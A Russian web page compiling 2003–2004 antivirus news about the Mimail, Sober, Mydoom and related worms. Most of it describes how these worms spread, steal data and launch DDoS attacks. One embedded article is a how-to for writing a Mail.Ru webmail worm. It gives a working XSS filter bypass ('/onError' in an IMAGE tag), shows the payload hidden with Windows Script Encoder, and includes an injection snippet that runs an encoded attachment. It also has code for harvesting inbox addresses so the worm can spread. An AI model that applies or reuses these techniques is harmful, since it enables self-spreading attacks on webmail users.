Наконец, червь создает у пользователей ложное чувство безопасности и провоцирует пассивное отношение к собственной защите. Подобное безразличие и бездействие пользователей ведет к непредсказуемым последствиям. В результате инт ернет может превратиться в поле битвы вирусов, а сетевой трафик - в скопище вредоносных программ, борящихся за превосходство друг над другом.
В заключение, "Лаборатория Касперского" еще раз утверждает: нет полезных вирусов. Есть вирусы деструктивные и недеструктивные. Но все они являются киберпреступлением, поскольку выполняют несанкционированные действия и всегда имеют негативные побочные действия.


04 Ноябрь 2003  Тема, данной статьи - изучение работы червей, использующих для перемещения уязвимости web-интерфейсов в почтовых сервисах. Но именно изучение, поскольку использование данного материала, выходит за пределы дозволенного законодательством...
Написание червей достаточно интересное занятие, поскольку для их функционирования постоянно приходится находить новые решения, порой даже далекие от стандартов. Для написания червей, использующих web-интерфейс, положение еще более усугубляется рядом факторов, но о них мы поговорим немного позже, а пока остановимся на выборе платформы для его функционирования.Он далеко не случаен, именно с этого почтового сервиса начиналась моя "исследовательская работа". 
Внедрение
Первое, чего необходимо добиться, это использование JavaScript, поскольку Mail.Ru фиксирует и, соответственно, фильтрует все попытки его внедрения в письмо. В ходе экспериментов было установлено, что одна из конструкций, все таки остается незамеченной и благополучно позволяет внедрить произвольный скрипт. Найденная ошибка связана с обработкой событий для HTML тэгов. В стандартном случае, сервер успешно блокирует их исполнение. Например:

<IMAGE SRC="c:\noImage" onError="alert('Java execution!')">

успешно опознается и блокируется. Для опознания в данном случае был использован шаблон " onError=". Но создатели, видимо, не учли тот факт, что вполне приемлемой является, также и конструкция:

<IMAGE SRC="c:\noImage"/onError="alert('Java execution!')">

В результате работы которой на мониторе появится сообщение "Java execution!". Этого вполне достаточно для написания червя, но не нам  Посудите сами, код червя получится достаточно большей и поэтому его неудобно содержать в обработчике onError, в добавок код будет отфильтрован, что может пагубно повлиять на его работоспособность. Есть несколько выходов:

Первый и второй варианты - неприемлемы, поскольку червь должен быть независимым от внешних Интернет ресурсов. В нагрузку, перекинув пользователя на другой сервер, мы выходим из доменной зоны почтового сервера. Остается только шифрование, как наиболее рациональное решение. Поскольку способов зашифровать произвольный скрипт достаточно много, то выбирать естественно вам. Но я для этих целей воспользовался Windows Script Encoder. О его работе я когда-то писал статью на websec.ru. Но, тем не менее, попробую вкратце объяснить как он работает. Запускаете "screnc.exe шифрумый_файл зашифрованный_файл". Таким образом строка:
alert('Java execution!')
примет вид:
#@~^GQAAAA==C^+.D`E9l7l,n6m;YbWUZE#iiQgAAA==^#~@ 
Преимущество данного (зашифрованного) формата в том, что он не содержит запрещенных символов. Для его использования нет нужды в дешифраторе, поскольку он встроен в Internet Explorer. А исполнить его можно указав соответствующий язык программирования в тэге <script>:

<SCRIPT language="JavaScript.Encode">
#@~^GQAAAA==C^+.D`E9l7l,n6m;YbWUZE#iiQgAAA==^#~@ 
</SCRIPT>

Для проделки всего вышеописанного на Mail.Ru, загрузим зашифрованный скрипт как main.gif, а в приаттаченый HTML файл внедрим скрипт исполняющий его:

<html>
<image src="c:\noImage"/onError="document.all.tags('sc' +'ript')[0].language='JS'+ 'cript.Encode';document.all.tags('sc'+ 'ript')[0].src= 'http://win.mail.ru/cgi-bin/readmsg/main.gif?id=' +document.forms[0].id.value+ ';0;1&mode=attachment'">

На данном этапе, следует с кое-чем разобраться. Объект "document.all.tags('sc'+'ript')[0].language" указывает на язык первого использованного скрипта в HTML файле, указав в качестве значения "'JS'+'cript.Encode" мы сообщаем, что загруженный в этот тэг скрипт будет зашифрован. Далее мы указываем URL для используемого скрипта, в данном случае мы ссылаемся на первый аттач к нашему письму. Чтобы вы не думали, что все делается через задницу: такие конструкции - единственный способ добраться к присоединенному файлу (поскольку все работает на идентификаторах), а шифрование поможет нам спрятать тело червя и в будущем доставит трудности при попытке расшифровки его исходного кода работниками Mail.Ru.
Новые решения
Для рассылки червя на все адреса из папки Inbox (вообще-то только те, что принадлежат компании Mail.Ru. В часности @mail.ru, @inbox.ru, и т.д.), необходимо знать их! Это составляет трудности, поскольку все действия, как уже говорилось, осуществляются с ID писем... Поэтому приходится загружать в отдельный фрейм каждое письмо, а уж потом из них выдирать e-mail отправителя. Согласитесь, такой подход достаточно медленно работает. Поэтому, для ускорения процесса, мной была разработана технология "частичной загрузки". Ее суть заключается в том, чтобы не загружать весь документ целиком, а только до нужной нам позиции. Достичь данного результата не составляет особых затруднений, если немного пошевелить мозгами. 
Технология проста - пытаться обратится к HTML элементу, находящемуся после требуемого. Если происходит ошибка, значит документ еще не загружен до требуемого уровня, в противном случае получаем требуемую информацию. Следует заметить, что устанавливается свой обработчик ошибок. Вот примерная реализация, вышеописанного метода:

ErrorStatus=0; //no errors
.....................

function ErrorHook()
{
ErrorStatus=1;
window.setInterval('checkInbox()',100);
return true;
}

function checkLoadStatus()
{
ErrorStatus=0;
window.onerror=ErrorHook;
}

function checkInbox()
{
сheckLoadStatus();
.......................... //обращение к элементу
if(!ErrorStatus)
{
//NO ERRORS
}
else
{
//ERRORS
}
}

Это часть скрипта-червя, которая и реализует "частичную загрузку". Все происходит в несколько шагов:

  1. Устанавливаем свой обработчик ошибок.
  2. Новый обработчик изменяет состояние флага ErrorStatus.
  3. При попытке чтения элемента:
    а) элемент не найден (следовательно: изменяется флаг, документ не догружен до требуемого уровня)
    возврат в пункту 1
    б) элемент найден (следовательно: флаг остается неизменным, требуемый уровень достигнут)
    чтение требуемых данных
    останавливаем загрузку в фрейм (указываем адрес about:blank)

Поскольку данная уязвимость еще не исправлена, позволю себе немного наглости и не раскрою вам исходного кода червя. В продолжении данной статьи мы более детально изучим работу почтового сервиса Mail.Ru. А пока следует остановится (людям которые поняли о чем идет речь, этого должно быть достаточно).

В данном варианте червь ничего не делает, кроме размножения.


"Mimail.c" является классическим почтовым червем, распространяющимся через электронные письма, которые выглядят следующим образом: Адрес отправителя: james@домен получателя Заголовок: Re[2]: our private photos Текст: Hello Dear!, Finally i've found possibility to right u, my lovely girl :) All our photos which i've made at the beach (even when u're without ur bh:)) photos are great! This evening i'll come and we'll make the best SEX :) Right now enjoy the photos. Kiss, James. Имя вложенного файла: photos.jpg.zip Интересно отметить, что адрес отправителя зараженных сообщений формируется с помощью добавления к нему домена получателя. Таким образом, затрудняется локализация эпицентра заражения и у пользователя может создаться впечатление, что письмо пришло от одного из коллег или знакомых. Если пользователь имел неосторожность открыть вложенный файл, то "Mimail.c" запускает процедуры внедрения на компьютер и дальнейшего распространения по сети. Прежде всего, червь копирует себя в каталог Windows с именем "netwatch.exe", регистрирует этот файл в ключе автозапуска системного реестра операционной системы и создает ряд дополнительных служебных файлов. В частности, при создании одного из этих файлов червь использует встроенные процедуры ZIP-архивации. Для рассылки зараженных писем "Mimail.c" также использует встроенные функции - специальную процедуру для распространения по протоколу SMTP. Червь сканирует файлы в каталогах "Shell Folders" и "Program Files" и считывает из них строки, похожие на адреса электронной почты. По найденным адресам "Mimail.c" незаметно для пользователя рассылает свои копии. Червь обладает опасным побочным действием, которое может вызвать существенный ущерб для пользователей платежной системы "E-Gold". В частности, "Mimail.c" следит за активностью приложений "E-Gold", установленными на зараженном компьютере, считывает из них конфиденциальные данные и отсылает на несколько анонимных адресов, принадлежащих автору червя. Помимо этого, со всех зараженных компьютеров червь осуществляет распределенную DoS-атаку на сайты www.darkprofits.com и www.darkprofits.net, отсылая на них в бесконечном цикле пакеты произвольного размера.


Nov 6  2003  Новый сетевой червь передает привет предшественнику Антивирусная компания "Лаборатория Касперского" сообщает о распространении нового сетевого червя. Вредоносная программа Sober была найдена еще в конце прошлой недели, в субботу, однако в понедельник произошел всплеск её активности. В методах, которые использует Sober, нет ничего нового. Как и множество его предшественников, он полагается, главным образом, на беспечность своих жертв. Червь распространяется по электронной почте. Чтобы заразить свой компьютер, пользователю достаточно запустить приложенный к письму файл с вирусом. Зараженные письма могут содержать самые разнообразные заголовки, тексты на английском и немецком языках, а также имена и расширения (PIF, BAT, SCR, COM, EXE) вложенных файлов. Это тоже характерная черта многих червей. Если пользователь имел неосторожность запустить вложенный в зараженное письмо файл, то "Sober" показывает на экране фальсифицированное сообщение об ошибке: "File not complete!" Затем червь создает в системном каталоге Windows три свои копии с различными именами и регистрирует их в ключе автозапуска системного реестра операционной системы. После этого "Sober" запускает процедуру распространения. Для этого он сначала находит на зараженном компьютере файлы, которые могут содержать электронные адреса (например, HTML, WAB, EML, PST и др.), считывает оттуда данные и, незаметно для владельца компьютера от его имени рассылает найденным адресатам свои копии. В теле вируса есть текст, где автор Sober выражает свое восхищение автором другого сетевого червя, Sobig. Эпидемия Sobig наделала много шума пару месяцев назад. Несмотря на его относительную безобидность, огромные потоки писем с Sobig, обрушившиеся практически на каждого пользователя интернета, существенно затрудняли работу с электронной почтой.


20/12/2003 Рецидив почтового червя "Sober"
"Лаборатория Касперского" сообщает об обнаружении новой модификации почтового червя "Sober" - "Sober.c" Семейство "Sober" принадлежит к классу почтовых червей. Настоящая модификация является третьей по счету с момента обнаружения оригинальной версии 27 октября 2003 г.
"Sober.c" отличается от оригинала расширенным функционалом и более хитрыми способами маскировки. Как и остальные представители семейства он пытается проникнуть на компьютер через зараженные электронные письма. Сами письма могут иметь различный внешний вид (на английском и немецком языках) и имена вложенных файлов. Например:
Тема:
why me?
Текст:
You say in the www. that i`m a terrorist!!!
No way out for you. I REPORT YOU !
You`ve said THAT about me
Имя вложенного файла:
terror-list.com

Необходимо отметить, что вложенные зараженные файлы могут также иметь расширения "bat", "cmd", "pif" и "scr". Если пользователь имел неосторожность запустить вложенный файл, то червь выводит на экран ложное сообщение о системной ошибке и начинает процедуру внедрения в компьютер. "Sober.c" создает в системном каталоге Windows три свои копии со случайными именами и регистрирует их в ключе автозапуска системного реестра. Таким образом, червь обеспечивает свою активизацию при каждой новой загрузке операционной системы.
После этого "Sober.c" немедленно начинает процедуру дальнейшего распространения. Прежде всего, он сканирует содержимое диска зараженного компьютера и выбирает из файлов с определенными расширениями (например, HTML, WAB, EML и т.д.) электронные адреса жертв. Затем, незаметно для пользователя рассылает по ним свои копии, используя встроенную подпрограмму работы по SMTP-протоколу.



23.12.2003           Обнаружен новый вариант червя "Sober"


"Лаборатория Касперского" предупреждает об обнаружении очередной версии вредоносной программы Sober - Sober.c. Червь Sober, напомним, появился 27 октября 2003 года, а его родиной, по всей видимости, является Германия. "Sober" написан на языке Visual Basic и упакован утилитой UPX (размер в сжатом виде ~ 73KB).

Фальсифицированное сообщение об ошибке
Фальсифицированное сообщение об ошибке

Как и большинство аналогичных вирусов, Sober.c распространяется посредством электронной почты в виде файлов-вложений с различными названиями. При этом и заголовок, и внешний вид (на английском и немецком языках) сообщения могут быть самыми разнообразными. При запуске вложения на экран выводится фальсифицированное сообщение об ошибке (см. скриншот), после чего инициируется процедура проникновения вируса на компьютер. Червь создает три свои копии в системном каталоге Windows и регистрирует их названия в ключе автозапуска системного реестра. Таким образом, вирус активируется при каждой загрузке операционной системы. Далее Sober.c производит сканирование доступных накопителей на предмет наличия адресов электронной почты. В случае обнаружения таковых вредоносная программа, используя встроенную утилиту работы по SMTP-протоколу, рассылает по ним свои копии.


На сегодняшний день зафиксированы лишь эпизодические случаи заражения червем, однако эксперты не исключают возможности массовой эпидемии. Впрочем, для российских пользователей вирус вряд ли представляет большую угрозу. Ведь, увидев в своем ящике письмо, присланное с неизвестного адреса да еще и на незнакомом языке, владелец аккаунта вряд ли рискнет просмотреть вложенный файл.



17 февраля 2004 года      Надежды на то, что червь Mydoom уйдет бесследно, оказались тщетны. По крайней мере семь червей уже используют результаты его работы.
DoomHunter.A попадает на компьютеры через лазейки, оставленные Mydoom.A и Mydoom.B. Обнаружив червей Blaster или Doomjuice, он устраняет все их следы. Более того, он пытается открыть порт TCP 3127 и, в случае успеха, он следит за ним до тех пор, пока компьютер, зараженный Mydoom.A или Mydoom.B, не попытается получить к нему доступ. В таком случае DoomHunter.A отправляет свою копию по IP адресу обнаруженного компьютера, запускает ее и пытается обезвредить Mydoom.A и Mydoom.B.Mitglieder.A также попадает в системы через лазейки, оставленные червями Mydoom, копируя себя в системы под именем system.exe. Он создан для завершения процессов определенных приложений. Кроме того, он создает запись в Реестре Windows для обеспечения своего присутствия на компьютере.
Deadhat.A и Deadhat.B распространяются через программу обмена файлами SoulSeek, а также через Интернет. Данные черви вызывают проблемы с загрузкой, поскольку они удаляют файлы, необходимые для корректного функционирования компьютера, и завершают процессы, выполняемые определенными антивирусами и межсетевыми экранами. Кроме того, они завершают процессы Mydoom.A и Mydoom.B.Deadhat.A и Deadhat.B открывают порт TCP 2766 и подключаются к серверу IRC, где ожидают команды управления, чтобы выполнить их на пораженных компьютерах. Кроме того, они позволяют загружать файлы на компьютер через удаленное соединение. Эти черви отличаются размером, а также файлом, создаваемым на зараженных компьютерах.
Nachi.B заражает только компьютеры с WinXP/2K/NT и распространяется на максимально возможное число компьютеров, используя известные бреши, такие как RPC DCOM, IIS WebDav и Workstation Service Overflow. Он распространяется путем атаки компьютеров и использования упомянутых выше брешей. 1 июня 2004 года, а также после этого числа червь удаляет себя.
Doomjuice.A и Doomjuice.B распространяются через Интернет, используя лазейки, оставленные Mydoom.A и Mydoom.B на зараженных компьютерах. Черви инициируют распределенные отказы в обслуживании на веб сайте www.microsoft.com.
Версия B Doomjuice отличается от версии A размером и форматом сжатия. Также Doomjuice.A заносит на компьютеры файл, содержащий код Mydoom.A. Версия B этого не делает.
Однако, появился и червь Nachi.B, который удаляет Mydoom.A и Mydoom.B, завершая их процессы и удаляя соответствующие файлы.

seo & website usability   inet   html   os faq   hardware faq   memory   video   cpu   hdd   mainboard faq   printer & scaner   modem   mobiles

На главную | Cookie policy | Sitemap